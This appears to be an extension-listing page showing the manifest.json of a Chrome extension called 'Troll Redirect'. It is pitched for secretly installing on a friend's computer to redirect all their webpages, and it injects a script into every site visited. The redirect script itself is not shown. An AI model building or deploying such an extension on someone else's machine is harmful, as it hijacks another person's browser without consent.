Troll Redirect

Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "name": "Troll Redirect",
  "version": "1.0",
  "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
  "manifest_version": 2,
  "author": "Aaron Lockhart",
  "permissions": [
    "tabs",
    "storage"
  ],
  "content_scripts": [
    {
      "matches": [
        "*://*/*"
      ],
      "js": [
        "/src/troll.js"
      ],
      "run_at": "document_end"
    }
  ],
  "browser_action": {
    "default_popup": "/src/popup.html"
  }
}